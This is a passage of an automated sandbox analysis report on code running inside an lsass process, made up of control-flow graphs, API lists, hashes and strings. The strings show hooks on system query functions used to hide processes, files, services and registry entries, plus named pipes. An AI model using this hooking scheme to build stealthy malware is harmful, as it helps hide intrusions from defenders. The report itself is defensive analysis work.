                                                          control_flow_graph 229 161c734273c-161c73427a4 call 161c73429d4 * 4 238 161c73429b2 229->238 239 161c73427aa-161c73427ad 229->239 241 161c73429b4-161c73429d0 238->241 239->238 240 161c73427b3-161c73427b6 239->240 240->238 242 161c73427bc-161c73427bf 240->242 242->238 243 161c73427c5-161c73427e6 242->243 243->238 245 161c73427ec-161c734280c 243->245 246 161c7342838-161c734283f 245->246 247 161c734280e-161c7342836 245->247 248 161c7342845-161c7342852 246->248 249 161c73428df-161c73428e6 246->249 247->246 247->247 248->249 252 161c7342858-161c734286a LoadLibraryA 248->252 250 161c7342992-161c73429b0 249->250 251 161c73428ec-161c7342901 249->251 250->241 251->250 253 161c7342907 251->253 254 161c73428ca-161c73428d2 252->254 255 161c734286c-161c7342878 252->255 258 161c734290d-161c7342921 253->258 254->252 256 161c73428d4-161c73428d9 254->256 259 161c73428c5-161c73428c8 255->259 256->249 261 161c7342982-161c734298c 258->261 262 161c7342923-161c7342934 258->262 259->254 260 161c734287a-161c734287d 259->260 263 161c73428a7-161c73428b7 260->263 264 161c734287f-161c73428a5 260->264 261->250 261->258 266 161c7342936-161c734293d 262->266 267 161c734293f-161c7342943 262->267 268 161c73428ba-161c73428c1 263->268 264->268 269 161c7342970-161c7342980 266->269 270 161c7342945-161c734294b 267->270 271 161c734294d-161c7342951 267->271 268->259 269->261 269->262 270->269 272 161c7342963-161c7342967 271->272 273 161c7342953-161c7342961 271->273 272->269 275 161c7342969-161c734296c 272->275 273->269 275->269
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction ID: da0ab83d72a584d2851d1aaa293e7563e2827ef984a0d2a4de2f8cd02ee3da86
                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                          • Instruction Fuzzy Hash: 6961323AB4169097DB5CCF1588007BDBBA2FB54BA4F1CE121DE5923788DA79D862C708

                                                          Non-executed Functions

                                                          Function 00000161C7372B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 480 161c7372b2c-161c7372ba5 call 161c7392ce0 483 161c7372ee0-161c7372f03 480->483 484 161c7372bab-161c7372bb1 480->484 484->483 485 161c7372bb7-161c7372bba 484->485 485->483 486 161c7372bc0-161c7372bc3 485->486 486->483 487 161c7372bc9-161c7372bd9 GetModuleHandleA 486->487 488 161c7372bed 487->488 489 161c7372bdb-161c7372beb GetProcAddress 487->489 490 161c7372bf0-161c7372c0e 488->490 489->490 490->483 492 161c7372c14-161c7372c33 StrCmpNIW 490->492 492->483 493 161c7372c39-161c7372c3d 492->493 493->483 494 161c7372c43-161c7372c4d 493->494 494->483 495 161c7372c53-161c7372c5a 494->495 495->483 496 161c7372c60-161c7372c73 495->496 497 161c7372c75-161c7372c81 496->497 498 161c7372c83 496->498 499 161c7372c86-161c7372c8a 497->499 498->499 500 161c7372c8c-161c7372c98 499->500 501 161c7372c9a 499->501 502 161c7372c9d-161c7372ca7 500->502 501->502 503 161c7372d9d-161c7372da1 502->503 504 161c7372cad-161c7372cb0 502->504 505 161c7372da7-161c7372daa 503->505 506 161c7372ed2-161c7372eda 503->506 507 161c7372cc2-161c7372ccc 504->507 508 161c7372cb2-161c7372cbf call 161c737199c 504->508 512 161c7372dac-161c7372db8 call 161c737199c 505->512 513 161c7372dbb-161c7372dc5 505->513 506->483 506->496 510 161c7372d00-161c7372d0a 507->510 511 161c7372cce-161c7372cdb 507->511 508->507 516 161c7372d0c-161c7372d19 510->516 517 161c7372d3a-161c7372d3d 510->517 511->510 515 161c7372cdd-161c7372cea 511->515 512->513 519 161c7372dc7-161c7372dd4 513->519 520 161c7372df5-161c7372df8 513->520 524 161c7372ced-161c7372cf3 515->524 516->517 525 161c7372d1b-161c7372d28 516->525 526 161c7372d3f-161c7372d49 call 161c7371bbc 517->526 527 161c7372d4b-161c7372d58 lstrlenW 517->527 519->520 521 161c7372dd6-161c7372de3 519->521 522 161c7372e05-161c7372e12 lstrlenW 520->522 523 161c7372dfa-161c7372e03 call 161c7371bbc 520->523 529 161c7372de6-161c7372dec 521->529 535 161c7372e35-161c7372e3f call 161c7373844 522->535 536 161c7372e14-161c7372e1e 522->536 523->522 540 161c7372e4a-161c7372e55 523->540 533 161c7372d93-161c7372d98 524->533 534 161c7372cf9-161c7372cfe 524->534 537 161c7372d2b-161c7372d31 525->537 526->527 526->533 530 161c7372d7b-161c7372d8d call 161c7373844 527->530 531 161c7372d5a-161c7372d64 527->531 539 161c7372dee-161c7372df3 529->539 529->540 530->533 544 161c7372e42-161c7372e44 530->544 531->530 541 161c7372d66-161c7372d79 call 161c737152c 531->541 533->544 534->510 534->524 535->544 536->535 545 161c7372e20-161c7372e33 call 161c737152c 536->545 537->533 546 161c7372d33-161c7372d38 537->546 539->520 539->529 549 161c7372e57-161c7372e5b 540->549 550 161c7372ecc-161c7372ed0 540->550 541->530 541->533 544->506 544->540 545->535 545->540 546->517 546->537 555 161c7372e63-161c7372e7d call 161c73785c0 549->555 556 161c7372e5d-161c7372e61 549->556 550->506 559 161c7372e80-161c7372e83 555->559 556->555 556->559 562 161c7372ea6-161c7372ea9 559->562 563 161c7372e85-161c7372ea3 call 161c73785c0 559->563 562->550 565 161c7372eab-161c7372ec9 call 161c73785c0 562->565 563->562 565->550
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction ID: cc7f43282c6bcacbbedde7fdd0a6c5ba627a74df17648da25dd8e11144f4be11
                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                          • Instruction Fuzzy Hash: EDB1AE72250A90A2EB68CF25CE407FDA3B5FB44B94F48A016EE4953B95DFB6CC80C744
                                                          Function 00000161C7377D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction ID: bf1d1a219f92c3ba8e030b786b37f49a0c16158c9bfc781915155d99e130d8a2
                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                          • Instruction Fuzzy Hash: 50316D72345B80DAEB60DF60E8843EDB360F784744F48542ADA4E47B99EFB9C648C710
                                                          Function 00000161C737D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction ID: e1309aaae64de3e3b239c776bfb3c83d264d389b8f59a0a0cb2a903857dc2d83
                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                          • Instruction Fuzzy Hash: E5318032254F8096EB60CF25EC803EEB3A0F789754F581126EA9D43BA9DF7AC145CB00
                                                          Function 00000161C73712BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction ID: c2dcf856e1ec8c1a8b884aab428fc44f774ece3321c3515c76aee0e079da8718
                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                          • Instruction Fuzzy Hash: AC516B72250B84D6EB50CF62E9483AEB7A1F388FC9F085125DA4A0771AEF7DC049C700
                                                          Function 00000161C7371D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                          • API String ID: 4175298099-1975688563
                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction ID: 2fdab0fec82b3a540c2b6322f794a3a7be459b4b7876f721acc66648472917d8
                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                          • Instruction Fuzzy Hash: 2031D77519194AB0EA06EF65ED627FCA330B748394FCCB123D489122769FFAC249C794
                                                          Function 00000161C7346910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 324 161c7346910-161c7346916 325 161c7346918-161c734691b 324->325 326 161c7346951-161c734695b 324->326 327 161c7346945-161c7346984 call 161c7346fc0 325->327 328 161c734691d-161c7346920 325->328 329 161c7346a78-161c7346a8d 326->329 344 161c7346a52 327->344 345 161c734698a-161c734699f call 161c7346e54 327->345 330 161c7346938 __scrt_dllmain_crt_thread_attach 328->330 331 161c7346922-161c7346925 328->331 332 161c7346a8f 329->332 333 161c7346a9c-161c7346ab6 call 161c7346e54 329->333 339 161c734693d-161c7346944 330->339 335 161c7346927-161c7346930 331->335 336 161c7346931-161c7346936 call 161c7346f04 331->336 337 161c7346a91-161c7346a9b 332->337 347 161c7346ab8-161c7346aed call 161c7346f7c call 161c7346e1c call 161c7347318 call 161c7347130 call 161c7347154 call 161c7346fac 333->347 348 161c7346aef-161c7346b20 call 161c7347190 333->348 336->339 349 161c7346a54-161c7346a69 344->349 356 161c73469a5-161c73469b6 call 161c7346ec4 345->356 357 161c7346a6a-161c7346a77 call 161c7347190 345->357 347->337 358 161c7346b31-161c7346b37 348->358 359 161c7346b22-161c7346b28 348->359 377 161c7346a07-161c7346a11 call 161c7347130 356->377 378 161c73469b8-161c73469dc call 161c73472dc call 161c7346e0c call 161c7346e38 call 161c734ac0c 356->378 357->329 364 161c7346b7e-161c7346b94 call 161c734268c 358->364 365 161c7346b39-161c7346b43 358->365 359->358 363 161c7346b2a-161c7346b2c 359->363 371 161c7346c1f-161c7346c2c 363->371 385 161c7346b96-161c7346b98 364->385 386 161c7346bcc-161c7346bce 364->386 372 161c7346b45-161c7346b4d 365->372 373 161c7346b4f-161c7346b5d call 161c7355780 365->373 374 161c7346b63-161c7346b78 call 161c7346910 372->374 373->374 390 161c7346c15-161c7346c1d 373->390 374->364 374->390 377->344 397 161c7346a13-161c7346a1f call 161c7347180 377->397 378->377 426 161c73469de-161c73469e5 __scrt_dllmain_after_initialize_c 378->426 385->386 394 161c7346b9a-161c7346bbc call 161c734268c call 161c7346a78 385->394 387 161c7346bd5-161c7346bea call 161c7346910 386->387 388 161c7346bd0-161c7346bd3 386->388 387->390 406 161c7346bec-161c7346bf6 387->406 388->387 388->390 390->371 394->386 421 161c7346bbe-161c7346bc6 call 161c7355780 394->421 414 161c7346a45-161c7346a50 397->414 415 161c7346a21-161c7346a2b call 161c7347098 397->415 411 161c7346bf8-161c7346bff 406->411 412 161c7346c01-161c7346c11 call 161c7355780 406->412 411->390 412->390 414->349 415->414 427 161c7346a2d-161c7346a3b 415->427 421->386 426->377 428 161c73469e7-161c7346a04 call 161c734abc8 426->428 427->414 428->377
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                          • API String ID: 190073905-1786718095
                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction ID: d5e98ec3fc269c9cf2f4103fb51fb5e2ff101f1a91cdb49b896e9615eadceab7
                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                          • Instruction Fuzzy Hash: 3A8103BA780601E6FB98DF669C413FD2BE1EB85780F1CB025994547396DBFBC8858B00
                                                          Function 00000161C737CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 00000161C737CE37
                                                          • FlsGetValue.KERNEL32(?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CE4C
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CE6D
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CE9A
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CEAB
                                                          • FlsSetValue.KERNEL32(?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CEBC
                                                          • SetLastError.KERNEL32 ref: 00000161C737CED7
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CF0D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000161C737ECCC,?,?,?,?,00000161C737BF9F,?,?,?,?,?,00000161C7377AB0), ref: 00000161C737CF2C
                                                            • Part of subcall function 00000161C737D6CC: HeapAlloc.KERNEL32 ref: 00000161C737D721
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CF54
                                                            • Part of subcall function 00000161C737D744: HeapFree.KERNEL32 ref: 00000161C737D75A
                                                            • Part of subcall function 00000161C737D744: GetLastError.KERNEL32 ref: 00000161C737D764
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CF65
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000161C7380A6B,?,?,?,00000161C738045C,?,?,?,00000161C737C84F), ref: 00000161C737CF76
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction ID: f6c54b11cdd91e450f0829473298fdd4f1bd68741a1d65e0f70374ec834d6063
                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                          • Instruction Fuzzy Hash: 7A418E302D128462FA69E7315F523FDE2866BC47F0F2D7724A8364A7E6DEEB84019301
                                                          Function 00000161C7372244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                          • API String ID: 2171963597-1373409510
                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction ID: 7fdcf24f19a736581667a14c724bfb04ed4f6bfc9d230d2b90c2b3c1ca90f480
                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                          • Instruction Fuzzy Hash: 7C21B072258B40D3FB10CB24F9043AD73A1F388BA4F585216EA9903BA8CFBDC149CB04
                                                          Function 00000161C7349944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 578 161c7349944-161c73499ac call 161c734a814 581 161c73499b2-161c73499b5 578->581 582 161c7349e13-161c7349e1b call 161c734bb48 578->582 581->582 583 161c73499bb-161c73499c1 581->583 586 161c73499c7-161c73499cb 583->586 587 161c7349a90-161c7349aa2 583->587 586->587 590 161c73499d1-161c73499dc 586->590 588 161c7349aa8-161c7349aac 587->588 589 161c7349d63-161c7349d67 587->589 588->589 593 161c7349ab2-161c7349abd 588->593 591 161c7349da0-161c7349daa call 161c7348a34 589->591 592 161c7349d69-161c7349d70 589->592 590->587 594 161c73499e2-161c73499e7 590->594 591->582 606 161c7349dac-161c7349dcb call 161c7346d40 591->606 592->582 596 161c7349d76-161c7349d9b call 161c7349e1c 592->596 593->589 598 161c7349ac3-161c7349aca 593->598 594->587 595 161c73499ed-161c73499f7 call 161c7348a34 594->595 595->606 609 161c73499fd-161c7349a28 call 161c7348a34 * 2 call 161c7349124 595->609 596->591 599 161c7349c94-161c7349ca0 598->599 600 161c7349ad0-161c7349b07 call 161c7348e10 598->600 599->591 607 161c7349ca6-161c7349caa 599->607 600->599 614 161c7349b0d-161c7349b15 600->614 611 161c7349cba-161c7349cc2 607->611 612 161c7349cac-161c7349cb8 call 161c73490e4 607->612 646 161c7349a48-161c7349a52 call 161c7348a34 609->646 647 161c7349a2a-161c7349a2e 609->647 611->591 613 161c7349cc8-161c7349cd5 call 161c7348cb4 611->613 612->611 622 161c7349cdb-161c7349ce3 612->622 613->591 613->622 620 161c7349b19-161c7349b4b 614->620 624 161c7349c87-161c7349c8e 620->624 625 161c7349b51-161c7349b5c 620->625 627 161c7349df6-161c7349e12 call 161c7348a34 * 2 call 161c734baa8 622->627 628 161c7349ce9-161c7349ced 622->628 624->599 624->620 625->624 629 161c7349b62-161c7349b7b 625->629 627->582 631 161c7349cef-161c7349cfe call 161c73490e4 628->631 632 161c7349d00 628->632 633 161c7349b81-161c7349bc6 call 161c73490f8 * 2 629->633 634 161c7349c74-161c7349c79 629->634 642 161c7349d03-161c7349d0d call 161c734a8ac 631->642 632->642 660 161c7349bc8-161c7349bee call 161c73490f8 call 161c734a038 633->660 661 161c7349c04-161c7349c0a 633->661 639 161c7349c84 634->639 639->624 642->591 657 161c7349d13-161c7349d61 call 161c7348d44 call 161c7348f50 642->657 646->587 659 161c7349a54-161c7349a74 call 161c7348a34 * 2 call 161c734a8ac 646->659 647->646 651 161c7349a30-161c7349a3b 647->651 651->646 656 161c7349a3d-161c7349a42 651->656 656->582 656->646 657->591 684 161c7349a76-161c7349a80 call 161c734a99c 659->684 685 161c7349a8b 659->685 678 161c7349c15-161c7349c72 call 161c7349870 660->678 679 161c7349bf0-161c7349c02 660->679 666 161c7349c7b 661->666 667 161c7349c0c-161c7349c10 661->667 671 161c7349c80 666->671 667->633 671->639 678->671 679->660 679->661 688 161c7349a86-161c7349def call 161c73486ac call 161c734a3f4 call 161c73488a0 684->688 689 161c7349df0-161c7349df5 call 161c734baa8 684->689 685->587 688->689 689->627
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633242451.00000161C7340000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7340000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction ID: 4055e2952169952a67fc28b38842acc0649faafab52237d901a7368b1939d73b
                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                          • Instruction Fuzzy Hash: E1E1057B6447409AEB68DF65D8803FD7FA0F745B88F082105EE8957B99CBB5C491CB04
                                                          Function 00000161C737A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 699 161c737a544-161c737a5ac call 161c737b414 702 161c737aa13-161c737aa1b call 161c737c748 699->702 703 161c737a5b2-161c737a5b5 699->703 703->702 704 161c737a5bb-161c737a5c1 703->704 706 161c737a5c7-161c737a5cb 704->706 707 161c737a690-161c737a6a2 704->707 706->707 711 161c737a5d1-161c737a5dc 706->711 709 161c737a6a8-161c737a6ac 707->709 710 161c737a963-161c737a967 707->710 709->710 712 161c737a6b2-161c737a6bd 709->712 714 161c737a9a0-161c737a9aa call 161c7379634 710->714 715 161c737a969-161c737a970 710->715 711->707 713 161c737a5e2-161c737a5e7 711->713 712->710 718 161c737a6c3-161c737a6ca 712->718 713->707 719 161c737a5ed-161c737a5f7 call 161c7379634 713->719 714->702 725 161c737a9ac-161c737a9cb call 161c7377940 714->725 715->702 716 161c737a976-161c737a99b call 161c737aa1c 715->716 716->714 722 161c737a894-161c737a8a0 718->722 723 161c737a6d0-161c737a707 call 161c7379a10 718->723 719->725 733 161c737a5fd-161c737a628 call 161c7379634 * 2 call 161c7379d24 719->733 722->714 726 161c737a8a6-161c737a8aa 722->726 723->722 737 161c737a70d-161c737a715 723->737 730 161c737a8ac-161c737a8b8 call 161c7379ce4 726->730 731 161c737a8ba-161c737a8c2 726->731 730->731 746 161c737a8db-161c737a8e3 730->746 731->714 736 161c737a8c8-161c737a8d5 call 161c73798b4 731->736 767 161c737a648-161c737a652 call 161c7379634 733->767 768 161c737a62a-161c737a62e 733->768 736->714 736->746 742 161c737a719-161c737a74b 737->742 743 161c737a887-161c737a88e 742->743 744 161c737a751-161c737a75c 742->744 743->722 743->742 744->743 748 161c737a762-161c737a77b 744->748 749 161c737a9f6-161c737aa12 call 161c7379634 * 2 call 161c737c6a8 746->749 750 161c737a8e9-161c737a8ed 746->750 752 161c737a874-161c737a879 748->752 753 161c737a781-161c737a7c6 call 161c7379cf8 * 2 748->753 749->702 754 161c737a900 750->754 755 161c737a8ef-161c737a8fe call 161c7379ce4 750->755 758 161c737a884 752->758 780 161c737a7c8-161c737a7ee call 161c7379cf8 call 161c737ac38 753->780 781 161c737a804-161c737a80a 753->781 763 161c737a903-161c737a90d call 161c737b4ac 754->763 755->763 758->743 763->714 778 161c737a913-161c737a961 call 161c7379944 call 161c7379b50 763->778 767->707 784 161c737a654-161c737a674 call 161c7379634 * 2 call 161c737b4ac 767->784 768->767 772 161c737a630-161c737a63b 768->772 772->767 777 161c737a63d-161c737a642 772->777 777->702 777->767 778->714 800 161c737a815-161c737a872 call 161c737a470 780->800 801 161c737a7f0-161c737a802 780->801 788 161c737a80c-161c737a810 781->788 789 161c737a87b 781->789 805 161c737a676-161c737a680 call 161c737b59c 784->805 806 161c737a68b 784->806 788->753 790 161c737a880 789->790 790->758 800->790 801->780 801->781 809 161c737a686-161c737a9ef call 161c73792ac call 161c737aff4 call 161c73794a0 805->809 810 161c737a9f0-161c737a9f5 call 161c737c6a8 805->810 806->707 809->810 810->749
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction ID: eb71b8638c1dc9af55b8d51c4b4f79b02297170f364a79154c590ebb85fb9cd7
                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                          • Instruction Fuzzy Hash: AAE1F472640740AAEB60DF69DE803FDBBB0F749B98F086215EE8997B95CB75C091C700
                                                          Function 00000161C737F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_41_2_161c7370000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction ID: 65ecafbe0cd00d5688fdbeaf4ca3cfe22884f39f67cb83545bee16cca065e91c
                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                          • Instruction Fuzzy Hash: A5410732391A11B2FA55CB16AE04BFDA391FB45BE0F1D61259D0D97785EEBEC446C300
                                                          Function 00000161C737104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000029.00000002.2633431952.00000161C7370000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000161C7370000, based on PE: true
                                                          Joe Sandbox IDA Plugin
